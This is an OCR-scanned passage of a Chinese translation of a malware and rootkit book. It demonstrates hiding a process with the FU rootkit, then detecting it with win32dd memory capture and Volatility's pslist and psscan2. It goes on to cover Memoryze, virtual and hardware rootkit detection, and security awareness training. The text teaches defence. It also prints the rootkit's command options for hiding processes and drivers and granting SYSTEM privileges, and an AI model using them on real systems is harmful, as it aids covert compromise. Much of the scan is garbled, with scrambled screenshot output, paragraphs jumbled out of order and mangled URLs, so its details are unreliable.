otal number of processes 


=\FU_Rootkit\EXE>fu 
sage: fu 
[-p1] #number to list the first tnumber of processes 
[-ph] #PID to hide the process with ID 
[-pld] to list the named drivers in DhbgUiew 
[-phd] DRIVER_NAME to hide the named driver 
[-pas] #PID to set the AUTH_ID to SYSTEM on process #PID 
[-pr1] to list the available privileges 


[-prs] #PID #privilege_name to set privileges on process #PID 
[-pss] #PID #account_name to add #account_name SID to process #PID token 





Processes: 21 


Image Name 
alg.exe 

cmd.exe 
CSsrss,EXe 
explorer.exe 
Isass.exe 
msmsgs.exe 
services.,exe 
smss.exe 
spoolsv.exe 
svchost.exe 
svchost.exe 
svchost.exe 
svchost.exe 
svchost.exe 
System 

System Idle Process 
taskmar.exe 
VBoxService.exe 
VRoxTrav eye 


User Name 


LOCAL SERVICE 
tester 

SYSTEM 

tester 

SYSTEM 

tester 

SYSTEM 

SYSTEM 

SYSTEM 

SYSTEM 

NETWORK SERVICE 
SYSTEM 

NETWORK SERVICE 
LOCAL SERVICE 
SYSTEM 

SYSTEM 

tester 

SYSTEM 

tester 


C] Show processes from all users 


CPU Usage: 1% 


382 %888888888888888 


End Process 





Commit Charge: 98M } 1250M 





=\FU_Rootkit\EXE>fu -ph 1456 
=\FU_Rootkit\EXE> 了 | 


图 10-18 ”隐藏 一 个 进程 


使 用 前 面 提 到 的 一 个 内 存 获 取 工 具 (这 里 用 的 是 win32dd) ， 你 可 以 得 到 物理 内 存 的 一 个 快照 ， 如 图 10-19 所 示 。 


c C:\WINDOWS\system32\cmd.exe -olx| 


A 
C:\win32dd-i.2>win32dd memdump_fu.bin 4 
Win32dd — vi.2.206811@5 - Kernel land physical memory acquisition 
Copyright <c) 2007 - 2668. Matthieu Suiche <http://www.msuiche .net> 
Copyright <c> 2688. MoonSols <http://www.moonsols.com> 
-> Level: Ø — Type: Ø 
[win32dd] Lets dump it? 
[win32dd] Destination: \??\C:i\win32dd—-1.2\memdump_fu.bin 
[win32dd] Processing.... Done. 
[win32dd] Physical memory dumped. 
Time elapsed is 65 seconds. 
[win32dd] Leaving... 


C:z\win32dd-1 .2> 








图 10-19 ”取得 物理 内 存 的 一 个 快照 


捕捉 物理 内 人 存 之 后 ， 你 可 以 使 用 Volatility 的 pslist 和 psscan2 模 块 发 现 Rootkit 隐 藏 的 进程 。Pslist 模 块 寻找 内 存 转 储 中 
Windows 用 于 维护 活动 进程 列表 的 数据 结构 。 这 个 数据 结构 是 一 个 链表 ; 因此 这 种 扫描 技术 常 被 称 作 列表 遍历 (list 
walking) 。 这 种 技术 的 缺点 是 像 DKOM 这 样 的 Rootkit 技 巧 能 够 欺骗 扫描 程序 ， 因 为 DKOM 从 列表 中 删除 项 目 。 关 于 DKOM 如 
何 从 内 存 中 的 列表 删除 项 目的 更 多 信息 请 参阅 第 4 章 。 但 是 ， 使 用 psscan2 可 以 发 现 隐藏 的 进程 。psscan2 以 线性 的 风格 扫描 内 
存 ， 搜 索 EPROCESS 数 据 结构 。 内 存 转 储 中 找到 的 每 个 EPROCESS 结 构 代 表 Windows 中 的 一 个 进程 。 因 此 ， 如 果 psscan2 报 告 
一 个 在 pslist 输 出 中 没有 看 到 的 进程 的 EPROCESS 结 构 ， 那 么 这 个 进程 可 能 被 隐藏 。Pslist 和 psscan2 的 输出 如 图 10-20 所 示 。 


注意 ， 记 事 本 应 用 程序 的 进程 notepad.exe 在 pslist 的 输出 中 没有 显示 ， 但 是 出 现在 psscan2 的 输出 中 。 这 种 差异 应 该 能 立即 
提醒 分 析 人 员 对 这 个 进程 做 进一步 调查 。 理 解 了 每 个 模块 背后 的 扫描 技术 的 缺点 ， 分 析 人 员 能 够 得 出 结论 ， 即 DKOM 风 格 的 
Rootkit 手 段 正 在 起 作用 。 


分 析 人 员 的 下 一 步 是 使 用 Volatility 的 procdump 模 块 检查 notepad.exe 进 程 。 这 个 模块 将 解析 、 重 建 并 且 转 储 进程 映像 到 一 
个 二 进 制 执行 文件 ， 这 个 文件 可 以 在 一 个 调试 程序 中 进一步 分 析 。 调 试 程序 将 为 调查 人 员 提 供 可 疑 程序 功能 的 最 低级 视图 。 


用 插件 扩展 Volatility 的 能 


Volatility 的 真正 能 力 在 于 它 的 可 扩展 框架 ,调查 人 员 能 够 使 用 这 个 框架 的 核心 功能 编写 自己 的 插件 。 揪 件 是 依赖 Volatility 
核心 模块 提供 的 基本 类 和 功能 的 较 高 级 模块 。 


实际 上 ，Volatility 进 行 了 艰苦 的 挖 握 工作 并 将 数据 揭示 给 分 析 人 员 ， 分 析 人 员 的 任务 是 做 出 有 关 这 些 数据 的 有 意义 的 结 
论 。 出 于 这 个 目的 ， 自 从 Volatility1.3 发 行 之 后 编写 了 许多 插件 ， 包 括 检测 高 级 代码 注入 和 Rootkit、bot、 蠕 虫 存 在 的 插件 。 这 
种 可 扩展 性 使 调查 人 员 能 够 实施 研究 人 员 可 能 没有 时 间 在 代码 中 实际 实现 的 检测 技术 。 


cx |Cs WIND}: eee exe 


vchost .exe 
md .exe 
in32dd.exe 


=\volatility—-1.3> 


c. C:\WINDOWS\system32\cmd.exe 
=\volatility-1.3>python volatility psscan2 -f c:\win32dd-1.2\memdump_fu.bin 


ID PPID 
Remarks 


Time created 


66-66-86 
16:46:62 
16:46:04 
16:46:04 
16:46:05 
16:46:05 
16:46:07 
16:46:07 
16:46:08 
16:46:68 
16:46:68 
16:46:68 
16:46:68 
16:46:24 
16:46:28 
16:46:28 
16:46:37 
16:46:37 
17:32:52 
17:36:48 
17:47:36 
18:18:04 
18:18:21 





792 1996 Sat 


1116 Sat 
eHO msmsgs .exe 
164 666 Sat 


bgog explorer.exe 
796 660 Sat 
800A suchost .exe 
1456 1116 Sat 
d666 notepad.exe 
1124 666 Sat 


Feb 


Feb 


Feb 
Feb 


Feb 
Feb 
Feb 


18:18:21 
17:32:52 
18:18:04 
16:46:37 
16:46:37 
16:46:24 
16:46:28 
17:47:36 
17:36:59 
16:46:88 


Time exited Offset PDB 
2009 9xgle46658 0x149 
2009? OxA1f?1AdA Axa? 
2009 @x@1fa76286 G@xBdc 
2669 GxGifeedaB GBxide 
2009 0x02029528 Q@xle2 
2009 0x02075020 @x161 
2009 0x02079bh38 @x181 
2009 0x02129020 0x00? 
2009 @x@21324d8 @x@d3 
2009 9xg9214eg029 8xg975L 了 


图 10-20 ”pslist 和 psscan2 的 输出 


这 个 框架 的 能 力 的 一 个 实例 是 Michael Hale Ligh (https://github.com/volatilityfoundation/volatility/wiki/Command- 


意 软 件 。 


这 个 模块 检测 的 恶意 


Reference-Mal) 编写 的 Malfind 插 件 。 
软件 通常 采用 的 技术 是 ， 


这 个 插件 能 检测 使 用 代码 注入 隐藏 系统 上 的 存在 的 一 类 恶意 
将 一 个 恶意 DLL 注入 到 目标 进程 ， 然 后 修改 该 进程 的 映像 ， 


ProcessExplorer (一 个 免费 工具 ， 提 供 类 似 Windows 任 务 管理 器 的 功能 ) 之 类 的 诊断 工具 的 内 部 结构 。 


Malfind 插 件 依赖 于 检测 注入 代码 所 使 用 的 内 存 。 
Descriptor，VAD) 的 数据 结构 中 。 
间 ， 所 以 Windows 维 护 一 个 进程 实际 使 用 的 地 址 列表 。 


当 进 程 创建 时 ， 


节点 是 所 用 内 存 的 一 个 位 置 的 地 址 (单独 的 VAD) 。 


须 使 用 这 个 


结构 ， 而 且 不 能 在 不 退出 运行 


删除 和 /或 清除 某 些 将 其 存在 暴露 给 


这 段 内 存 的 地 址 存储 于 被 称 作 虚拟 地 址 描述 符 (Virtual Address 


会 得 到 大 量 的 虚拟 内 存 供 整 个 生命 期 使 用 。 然 而 ， 
这 个 列表 存储 在 单独 的 进程 中 一 个 被 称 为 VAD 树 的 结构 中 ， 树 中 的 每 个 
VAD 树 是 分 析 人 员 检 查 的 一 个 极 好 资源 ， 因 为 装 入 的 恶意 
的 情况 下 清除 或 者 删除 其 项 目 。 


进程 很 少 使 用 所 有 可 用 空 


意 软件 从 设计 上 必 


当 Malfind 运 行 时 ， 它 使 用 Volatility 核 心 模块 输出 的 VAD 信 息 检测 内 存 中 恶意 软件 /Rootkit 使 用 的 这 些 位 置 。 


Malfind 和 其 他 Volatility 揪 件 说 明了 Volatility 框 架 中 极 大 的 分 享 和 协作 机 会 。 尽 管 Malfind 是 由 Michael Hale Ligh 开 发 
的 ,但 是 背后 的 技术 是 根据 Brendan Dolan-Gavitt 关 于 虚拟 地 址 描述 符 (VAD) 的 研究 。Volatility 框 架 提 供 的 协同 使 领域 调查 
人 员 能 够 利用 和 实现 取证 研究 社区 产生 的 思路 。 


Volatility 不 断 扩 展 的 列表 在 http://www .forensicswiki.org/wiki/List_of_Volatility Plugins 上 维护 。 


Memoryze 


与 Volatility 的 脱 机 特性 相反 ，Mandiant Memoryze 是 一 个 在 内 存 转 储 和 真实 系统 上 都 能 寻找 Rootkit 和 恶意 软件 的 内 存 分 
析 工 具 。 因 为 我 们 已 经 介绍 了 使 用 Volatility 进 行 脱 机 内 存 分 析 ， 所 以 对 Memoryze 在 这 一 领域 的 功能 只 简单 提 及 。Memoryze 
是 基于 它们 的 旗舰 产品 Mandiant Intelligent Response (MIR) 的 代理 组 件 开 发 的 。 


Memoryze 有 多 个 组 件 : 


- XML audit scripts ”Mandiant 将 其 称 为 执行 脚本 或 者 审计 脚本 ， 作 为 Memotyze 程 序 的 配置 文件 。 这 些 脚 本 中 有 7 个 定义 了 


各 种 分 析 功 能 的 参数 。 
- Memoryze.exe 这 个 二 进 制 程序 从 XML 设置 文件 中 读 取 配置 数据 ， 并 且 导 入 必要 的 程序 库 /DLL 进 行 分 析 。 


- 批 处 理 脚本 ”这些 DOS 批 处 理 脚本 是 为 了 方便 用 户 。 用 户 可 以 执行 这 些 批 处 理 脚 本 交互 地 填写 XML 审计 脚本 设置 。 审 计 
脚本 中 的 所 有 功能 都 通过 命令 行 开 关 输 出 给 这 些 批 处 理 脚 本 。 


: 核心 程序 库 ”这 些 DLL 提供 程序 中 使 用 的 低级 分 析 功 能 。 


. 第 三 方程 序 库 这些 DIL 是 来 自 源 程序 ， 如 用 于 正则 表达 式 搜 索 的 Perl CompatibleRegular Expressions (PCRE) 和 用 于 压缩 


的 ZLIB。 


:内核 驱动 程序 Mandiant 内 核 程 序 库 生成 一 个 内 核 驱动 程序 mktools.sys， 并 在 Memoryze.exe 成 功 执行 时 将 其 插入 程序 的 目 
录 。 这 个 驱动 程序 为 应 用 程序 提供 内 核 模式 组 件 ， 大 部 分 数据 在 这 里 收集 以 供 之 后 的 分 析 。 


Mandiant 不 仅 提 供 了 你 在 Volatility 中 看 到 的 各 种 功能 ， 还 提供 了 更 多 的 实时 分 析 功 能 ,包括 : 
` 获取 全 部 或 者 部 分 物理 内 存 ， 包 括 单独 进程 的 地 址 空间 。 

: 从 用 户 模式 转 储 程序 二 进 制 文件 ， 从 内 核 模式 转 储 驱动 程序 。 

- 有 关 活 动 进程 的 信息 ， 如 打开 的 句柄 、 网 络 连接 和 庶 入 字符 串 。 

- 通过 SSDT、IDT 和 驱动 程序 IRP 表 中 的 钧 子 检测 进行 Rootkit 检 测 。 

: 枚 举 系统 信息 ， 如 进程 、 驱 动 程序 和 DLL。 


Memoryze 以 XML 格式 报告 其 结果 ， 这 种 格式 可 以 由 Mandiant 的 Audit Viewer 之 类 的 XML 查 看 器 使 用 。 此 外 ，XML 报 告 
也 可 以 在 任何 现代 浏览 器 中 查看 。 


为 了 检测 本 章 较 早 的 实例 中 隐藏 的 进程 ， 我 们 只 要 执行 不 带 参数 的 Process.bat 批 处 理 脚 本 。 这 个 批 处 理 脚本 填写 XML 审计 
脚本 ProcessAuditMemory.Batch.xml， 然 后 启动 带 有 必要 开关 的 Memoryze.exe。XML 报 告 显 示 了 notepad.exe 进 程 ; 但 是 它 
没有 指出 该 进程 是 隐藏 的 。 因 此 ， 分 析 人 员 必 须 对 所 寻找 的 东西 有 一 定 的 概念 ， 才 能 最 大 限度 地 利用 这 个 工具 的 特性 。 


尽管 Memoryze 提 供 内 存 获取 功能 ， 但 是 我 们 已 经 讨论 过 了 多 个 开源 的 替代 产品 。Memoryze 的 主要 优势 是 在 真实 系统 上 
进行 分 析 的 能 力 。 有 些 人 可 能 认为 这 是 一 个 缺点 ， 因 为 进行 实时 分 析 容 易 使 工具 遭受 真正 的 Rootkit 和 恶意 软件 的 主动 欺骗 。 确 
实 ， 这 是 Volatility 的 脱 机 分 析 模 型 背后 的 设计 思想 之 一 。 钩 子 检测 不 是 Volatility 的 固有 功能 ; 但 是 可 扩展 的 框架 为 分 析 人 员 提 
供 了 自己 开发 这 样 的 检测 插件 的 功能 。 


10.6 ”虚拟 Rootkit 检 测 


在 第 5 章 中 ， 我 们 讨论 了 虚拟 Rootkit 是 Rootkit 空 间 中 即将 到 来 的 趋势 。 当 虚拟 Rootkit 刚 刚 出 现时 ， 人 们 认为 它们 无 法 检 
测 。2007 年 年 底 斯 坦 福 大 学 和 卡 内 基 梅 隆 大 学 发 布 的 论文 《Compatibility ls Not Transparency: VMM Detection Myths 
and Realities) (兼容 性 不 是 透明 性 : VM M 检 测 的 神话 和 现实 ) 揭穿 了 虚拟 Rootkit 无 法 检测 的 神话 。 研 究 人 员 总 结 出 制作 一 
个 完全 仿真 硬件 的 虚拟 机 器 管理 程序 是 根本 不 可 行 的。 如 果 建 立 完美 的 VM Rootkit 是 不 可 行 的 ， 那 么 你 如 何 检测 呢 ? 这 一 研究 
可 能 是 不 精确 的 (只 有 时 间 能 告诉 我 们 ) ， 它 关注 于 许多 研究 人 员 、 用 户 和 系统 管理 员 使 用 VM M 检 测 来 确定 是 否 安装 了 虚拟 
Rootkit 这 一 事实 。 这 种 检测 的 前 提 是 如 果 一 台 机 器 是 支持 VMM 的 ， 但 是 没有 运行 虚拟 化 ， 那 么 ， 如 果 检 测 到 VMM ， 它 就 肯定 


是 一 个 Rootkit。 


大 部 分 VMM 检 测 很 简单 并 且 依 赖 于 已 知 的 虚拟 化 硬件 的 检测 、 资 源 或 者 时 间 攻 击 。 例 如 ， 如 果 网 卡 是 特殊 类 型 的 (如 
VMWare 或 Virtual PC) ， 表 示 OS 运 行 在 VMM 下 ， 这 可 能 意味 着 OS 也 被 一 个 Rootkit 所 控制 。 


这 种 想法 是 有 缺陷 的 ， 主 要 是 因为 ， 几 乎 所 有 企业 环境 都 由 于 成 本 、 可 用 性 和 可 靠 性 的 原因 而 采用 了 场 内 和 云 虚 拟 化 方案 。 
大 部 分 服务 器 和 工作 站 在 虚拟 环境 中 运行 的 原因 还 不 止 于 此 。 简 单 地 检测 操作 系统 是 否 运 行 于 一 个 系统 管理 程序 之 下 ， 将 不 足以 
证 明 Rootkit 已 经 控制 了 你 的 系统 。 


除了 VM M 检 测 ， 没 有 很 多 其 他 的 技术 能 够 帮助 确定 虚拟 的 Rootkit (如 Blue Pill) 正在 运行 。 大 部 分 的 攻击 的 执行 可 能 只 是 
为 了 确定 是 否 有 VMM。 


2013 年 ， 由 北 卡 莱 罗 纳 州 大 学 的 谢 雄 伟 (音译 ) 和 王 伟 超 (音译 ) 撰写 的 一 篇 论文 深入 介绍 了 虚拟 机 上 的 Rootkit 检 测 ， 这 
篇 文章 题 为 《Rootkit Detection on Virtual Machines through Deep Information Extraction at Hypervisor-level》 (通过 
系统 管理 器 级 的 深层 信息 提取 检测 虚拟 机 上 的 Rootkit，http://webpages.uncc.edu/wwang22/Research/papers/Xie-SPCC- 
13.pdf) ， 提 出 了 值得 了 解 和 试验 的 一 种 有 趣 的 检测 机 制 。 


两 位 学 者 提出 ， 通 过 系统 管理 器 级 别 上 的 深层 信息 提取 和 重 现 ， 设 计 一 种 虚拟 机 Rootkit 检 测 机 制 。 通 过 访问 VM 的 重要 组 
件 ， 如 内 核 符号 表 ， 系 统管 理 器 可 以 重 现 VM 的 执行 状态 ， 了 解 运 行进 程 、 活 动 网 络 连接 和 打开 文件 等 重要 信息 。 通 过 VM 执 行 
状态 重 现 的 不 同 部 分 之 间 的 交叉 验证 ， 我 们 可 以 检测 隐 含 的 信息 和 异常 的 连接 。 


10.7 ”基于 硬件 的 Rootkit 检 测 


所 有 前 面 讨论 过 的 防 Rootkit 解 决 方案 都 是 基于 软件 的 ， 但 是 创建 软件 来 删除 恶意 软件 非常 困难 ， 因 为 两 个 软件 必须 争夺 相 
同 的 资源 和 设备 。 如 果 基 于 软件 的 Rootkit 检 测 无 效 ， 那 么 实施 基于 硬件 的 Rootkit 检 测 会 如 何 呢 ” 有 一 个 公司 这 么 做 了 。 
Komoku 由 美国 国防 高 级 研究 计划 局 (DARPA) 、 国 家 安全 部 以 及 海军 于 2004 年 创立 ， 负 责 建 立 硬件 和 软件 Rootkit 检 测 解决 
方案 。Komoku 创 建 了 一 个 基于 硬件 的 解决 方案 CoPilot， 这 是 一 个 高 保障 的 PCI 卡 ， 能 够 在 硬件 级 别 监控 主机 的 内 人 存 和 文件 系 


统 。CoPilot 在 工作 站 或 者 服务 器 上 近 平 实时 地 扫描 和 评估 操作 系统 ， 寻 找 的 是 反常 行为 而 不 是 查找 具体 的 Rootkit。 


美国 政府 声明 基于 PCI 的 Rootkit 检 测 器 已 经 成 功 ， 但 是 因为 CoPilot 是 由 美国 政府 投资 的 ， 所 以 不 能 让 公众 订购 。 而 且 ， 由 
于 Microsoft 于 2008 年 3 月 收购 了 Komoku， 许 多 人 相信 Microsoft 不 会 继续 开发 CoPilot。 


2004 年 ，Grand Idea studios 创 建 了 一 个 能 够 从 真实 系统 中 捕捉 RAM 的 PCI 扩 展 卡 ; 这 个 产品 获得 了 美国 的 专利 ， 被 称 为 
Tribble， 由 Brian Carrier 和 Joe Grand (Kingpin of LOpht fame) 制作 。Tribble 是 一 个 能 够 捕捉 真实 系统 的 RAM 以 供 分 析 的 
PCI 扩 展 版 。 它 可 以 通过 Grand Idea Studio 的 专属 授权 取得 (http://www/grandideastudio.com/tribble) 。 


2005 年 ，BBN Technologies 开 发 了 一 个 硬件 设备 ， 可 以 插入 到 服务 器 或 者 工作 站 获得 RAM 的 一 个 副本 以 供 分 析 。 这 个 设 
备 被 称 为 取证 RAM 提 取 设 备 (FRED) 。 但 是 ， 该 工具 只 提供 从 实际 运行 的 系统 提取 RAM 的 能 力 ， 研 究 人 员 可 以 自行 使 用 其 他 
分 析 工 具 ， 确 定 RAM 的 内 容 是 否 包含 恶意 代码 。 


尽管 在 硬件 内 存 获取 和 Rootkit 检 测 中 有 这 些 进步 ， 但 仍然 有 很 多 需要 做 的 。 在 2007 年 ，Joanna Rutkowska 证 明了 即使 使 
用 硬件 检测 ， 特 别 制作 的 Rootkit 仍 然 能 向 开 检 测 。 使 用 AMD64 平 台 ，Joanna 展 示 了 一 个 Rootkit 在 理论 上 能 够 向 一 个 硬件 设备 
提供 不 同 的 CPU 和 内 存 视图 ， 因 此 可 能 避 开 或 者 删除 Rootkit 本 身 的 特征 并 且 躲 开 检 测 。 尽 管 硬件 检测 是 最 好 的 解决 方案 ， 但 是 
难以 获得 这 些 产品 。 目 前 最 容易 得 到 的 是 Tribble， 可 以 从 Grand Idea Studio 获 得 该 产品 ， 但 是 能 否 获得 专属 许可 证 完全 取决 于 
制造 商 。 它 和 只 要 有 预算 就 能 随意 购买 的 软件 和 硬件 解决 方案 有 所 不 同 。 


我 们 前 面 提 到 过 ， 因 为 内 人 存 不 断 变 化 所 以 内 存 分 析 非 常 困难 。 许 多 新 的 硬件 方法 开始 寻求 新 的 途径 ， 以 获得 精确 而 且 可 靠 的 
内 存 快照 ， 同 时 不 干扰 系统 。 技 术 不 断 发 展 ， 由 于 新 操作 系统 的 发 行 和 支持 它们 的 新 硬件 的 出 现 ， 在 脱 机 内 存 转 储 中 必须 进行 分 
析 的 未 写 入 文档 和 写 入 文档 的 结构 数量 也 在 增加 。 这 些 工具 需要 更 多 的 研究 和 开发 ， 而 人 工分 析 的 部 分 将 需要 越 来 越 多 的 必要 知 


TR. 


10.8 小 结 


检测 Rootkit 是 很 难 的 。Rootkit 检 测 工 具 使 用 的 技术 很 容易 被 攻击 者 击败 ， 攻 击 者 花费 了 必要 的 时 间 确 保 Rootkit 不 被 这 些 
工具 发 现 。Rootkit 检 测 工 具 采 用 的 基本 技术 是 有 缺陷 的 ， 可 能 被 绕 开 。 尽 管 可 以 绕 开 Rootkit 检 测 程 序 ， 但 是 许多 Rootkit 作 者 
甚至 不 试图 防止 Rootkit 检 测 ， 因 为 大 部 分 攻击 不 需要 隐藏 Rootkit， 特 别 是 “ 打 了 就 跑 ” 的 攻击 ， 这 种 攻击 只 需要 恶意 软件 在 目 
标 系 统 上 存在 很 短 的 时 间 。 而 且 ， 因 为 许多 Rootkit 操 作 于 比 用 户 更 高 的 级 别 ， 对 文件 系统 或 者 注册 表 的 粗略 察看 可 能 建立 没 
安装 Rootkit 的 假象 ， 所 以 用 户 没 有 必要 运行 Rootkit 检 测 工具 。 


基于 硬件 的 Rootkit 检 测 展 现 出 了 一 些 前 景 ， 但 是 还 不 完美 并 且 需 要 额外 的 代价 。 尽 管 美国 政府 投资 的 公司 开发 了 这 样 的 系 
统 ， 但 是 目前 还 不 存在 商业 化 的 基于 硬件 rootkir 检 测 技 术 。 最 接近 的 是 Tribble， 它 需要 制造 商 的 批准 。 


最 后 ， 大 部 分 基于 软件 的 Rootkit 检 测 工具 都 是 免费 的 ， 但 是 需要 高 级 的 技巧 来 正确 分 析 产 生 的 数据 。 许 多 Rootkit 检 测 工具 
使 用 的 技术 被 组 合 到 商业 产品 中 ， 这 些 产 品 可 以 订购 并 且 在 整个 企业 中 部 署 。 因 为 没有 一 个 工具 能 够 找到 所 有 类 型 的 Rootkit， 
所 以 建议 使 用 多 种 Rootkit 检 测 和 删除 工具 ， 运 行 多 个 工具 确保 Rootkit 从 系统 上 正确 地 删除 。 


第 11 草 常规 安全 实践 


我 们 已 经 介绍 了 恶意 软件 和 Rootkit 的 各 种 功能 和 相关 的 保护 技术 ， 接 下 来 将 讨论 安全 实践 。 这 些 实践 围绕 简单 的 公司 策 
略 ， 例 如 用 户 教育 、 培 训 安全 意识 计划 、 修 补 和 更 新 策略 以 及 /或 者 简单 地 执行 行业 认可 的 安全 标准 。 在 本 章 中 ， 你 将 学 习 更 多 
的 简单 策略 ， 在 其 实施 后 能 够 改进 你 的 整体 安全 态势 并 且 降 低 恶 意 软 件 感染 风险 。 


11.1 最 终 用 户 教 育 


任何 安全 计划 中 的 一 个 重要 部 分 是 最 终 用 户 教育 。 用 户 需要 知道 警惕 什么 或 者 他 们 可 能 成 为 什么 威胁 的 受害 者 。 要 确保 网 络 
用 户 意识 到 可 能 发 生 的 事情 ， 使 他 们 能 够 更 仔细 地 观察 和 理解 出 现 差错 时 会 发 生 什么 。 对 于 安全 来 说 ， 最 终 用 户 是 你 的 第 一 道 和 
最 后 一 道 防线 。 没 有 任何 工具 、 企 业 套 件 以 及 /或 者 网 络 设备 能 够 使 你 免 遭 用 户 错误 的 侵害 。 


业界 一 直 有 个 笑话 : “如 果 想 要 保护 系统 安全 ， 就 要 将 用 户 排 除 在 外 。” 实 际 上 ， 我 们 都 知道 不 能 这 么 做 。 


把 避 开 互联 网 骗局 的 责任 放 到 没有 意识 到 威胁 的 用 户 肩 上 是 很 困难 的 。 计 算 机 用 户 受 困 于 大 量 的 安全 问题 ， 如 蠕虫 、 仿 冒 邮 
件 、 恶 意 网 站 以 及 许多 恶意 软件 ， 他 们 无 法 抵御 所 有 侵害 是 意义 深远 的 事实 。 你 总 是 会 看 到 安全 专家 谈 到 用 户 的 思 剧 ， 建 议 公司 
更 好 地 教育 他 们 关于 正确 的 安全 预防 措施 的 知识 ， 但 是 计算 机 安全 太 复 杂 ， 坏 人 太 狭 猎 且 有 创造 力 想 让 普通 用 户 能 够 在 进行 自己 
的 工作 的 同时 跟 上 每 种 潜在 威胁 是 不 现实 的 。 是 的 ， 你 可 以 告诉 一 个 人 不 要 打开 来 自 陌生 人 的 邮件 附件 ， 然 后 会 怎么 样 ? 攻击 者 
开始 发 送 似乎 来 自 老板 、 工 作 伙伴 以 及 用 户 的 配偶 或 者 最 好 的 朋友 的 邮件 。 在 现代 的 办 公 室 里 ， 你 无 法 不 单 击 附件 。 


全 世界 的 可 用 性 研究 已 经 发 现 人 们 很 不 情愿 给 出 自己 的 电子 邮件 地 址 ， 即 使 对 于 不 会 发 送 垃圾 邮件 的 真正 的 电子 商务 网 站 也 
是 如 此 ， 使 得 向 客户 发 送 有 用 的 信息 和 确认 信息 都 更 加 困难 。 持 续 地 让 用 户 对 每 种 可 能 的 攻击 感到 惊恐 是 不 合理 的 ， 但 是 ， 他 们 
确实 应 该 知道 会 发 生 什么 。 


11.2 了 解 恶意 软件 


熟悉 恶意 软件 的 行为 和 功能 性 是 很 重要 的 。 这 一 知识 将 帮助 你 理解 系统 为 什么 会 成 为 攻击 目标 ， 预 测 恶 意 软 件 如 何 感染 和 进 
入 目标 网 络 。 对 恶意 软件 的 研究 不 能 仪 限于 最 新 的 恶意 软件 ， 还 要 包含 历史 上 较为 流行 的 恶意 软件 。 你 将 了 解 恶意 软件 技术 发 展 
的 概况 ， 以 及 以 明智 的 方式 预测 恶意 软件 对 新 技术 的 侵害 所 需 的 知识 。 许 多 系统 ， 如 ATM (自动 柜员 机 ) 、 硬 件 控制 器 和 其 他 
工业 控制 系统 ， 也 因为 成 本 和 复杂 度 而 很 少 升级 ， 所 以 知道 如 何 保护 仍然 使 用 旧 操作 系统 的 设备 ， 是 不 可 或 缺 的 。 


安全 意识 培训 计划 


培训 计划 对 于 任何 公司 都 是 很 重要 的 ， 可 以 告诉 用 户 公司 策略 、 工 作 站 设置 、 网 络 驱动 数据 结构 以 及 任何 你 希望 培训 用 户 的 
网 络 安全 及 /或 常规 计算 机 使 用 信息 。 许 多 组 织 要 求 所 有 工作 人 员 在 加 入 组 织 时 进行 正式 的 安全 意识 培训 ， 并 在 之 后 定期 进行 培 
训 (一 般 是 每 年 一 次 ) 。 安 全 意识 培训 计划 的 一 些 常 见 主题 包括 : 


` 策略 在 你 的 安全 意识 培训 中 介绍 组 织 的 策略 和 程序 ， 提 醒 用 户 重要 的 策略 。 这 不 仅 应 该 包含 场 内 端点 和 系统 ， 还 应 该 包 


括 移 动 设备 ， 特 别 是 在 允许 自 带 设备 (BYOD) 的 组 织 内 部 。 


- 密码 ”讨论 公司 的 密码 策 咯 一 一 确保 每 个 人 对 实际 策略 的 各 个 部 分 都 有 清晰 的 理解 ， 例 如 密码 长 度 要 求 、 密 码 期 限 和 密码 
安全 (例如 ， 不 要 把 密码 写 在 即时 贴 上 ) 。 确 保 每 个 用 户 都 知道 这 个 策略 归根 到 底 是 任何 公司 最 重要 的 策略 。 





- 恶意 软件 包括 恶意 软件 爆发 时 应 该 遵循 的 程序 ， 以 及 用 户 为 了 避免 感染 所 应 该 警惕 的 事项 。 
. 电子 邮件 强调 电子 邮件 ， 使 用 户 理解 这 是 许多 恶意 软件 进入 网 络 的 方向 。 用 户 应 该 知道 组 织 的 电子 邮件 使 用 和 滥用 的 策 
略 。 


. 互联 网 使 用 确保 用 户 理解 访问 互联 网 是 特权 而 不 是 权利 。 用 户 必须 理解 使 用 互联 网 时 “该 做 和 不 该 做 的 ”， 以 及 应 该 知 
道 和 避免 的 事项 。 这 还 应 该 包含 社交 媒体 的 使 用 。 公 司 必须 建立 社交 媒体 使 用 策略 和 方针 。 员 工 可 能 是 最 好 的 大 使 一 一 也 可 能 是 





你 的 祸根 。 


. 资产 安全 ”指导 用 户 保护 他 们 的 便携 电子 设备 ， 帮 助 你 更 好 地 保护 公司 数据 。 还 有 ， 让 用 户 知道 你 实施 的 用 于 更 好 地 保护 
公司 数据 的 安全 功能 和 设备 。 


: 社会 工程 ”确保 用 户 理解 如 何 验证 某 些 人 的 身份 以 及 应 该 共享 和 不 应 该 共享 的 组 织 信 息 。 人 们 乐于 提供 信息 的 倾向 是 给 组 


织带 来 毁灭 性 灾难 的 最 大 成 因 。 
. 建筑 物 出 入 “解释 组 织 的 物理 安全 配置 。 
. 管理 的 考虑 ”教育 用 户 有 关 适 用 于 他 们 的 职位 以 及 /或 者 组 织 的 规则 。 


安全 意识 计划 不 仅 需要 指出 上 述 这 些 问 题 ， 还 要 让 员工 感到 自己 是 解决 方案 而 不 是 问题 的 一 部 分 。 你 可 以 用 许多 不 同 的 方法 
来 达到 这 一 目标 ， 包 括 竞赛 、 提 问 、 公 共 区 域 的 海报 以 及 自 备 午餐 的 学 习 课 程 。 通 过 反复 人 们 可 以 更 好 地 学 习 ， 所 以 建议 进行 定 
期 的 意识 培训 。 如 果 可 能 ， 将 安全 意识 作为 员工 例 行 工作 的 一 部 分 以 确保 成 功 。 


许多 公开 网 站 提供 可 以 下 载 的 安全 意识 计划 素材 ， 下 面 是 一 些 任何 组 织 都 可 以 使 用 的 资源 : 


` 国家 网 络 感知 系统 (https://www/us-cert.gov/government-users ) 


xy} 


.Cisco 安全 教育 (http://www.cisco.com/c/en/us/about/security-center/secutity-programs /security-education.html#-acc-panel-5) 


计算 机 安全 资源 中 心 (http://cstc.nist.gov/) 


W 
N 
% 
ie 
i 
we 
ie 
s> 


.ENISA 信 息 安全 意识 材料 (https://www.enisa/europa.eu/media/multimedia/ material) 

启动 和 维护 一 个 安全 意识 项 目 最 终 需 要 时 间 和 资源 。 如 果 公 司 没有 时 间 和 资源 ，Knowbe4 (http://www.knowbe4.com) 
等 第 三 方 公司 可 以 实施 安全 意识 项 目 。 
家 庭 用 户 的 恶意 软件 预防 


机 会 主义 攻击 者 的 最 大 目标 是 家 庭 用 户 。 例 如 ， 以 网 上 银行 凭据 、 社 交 网 络 密码 和 PIl (个 人 可 识别 信息 ) ABMS 
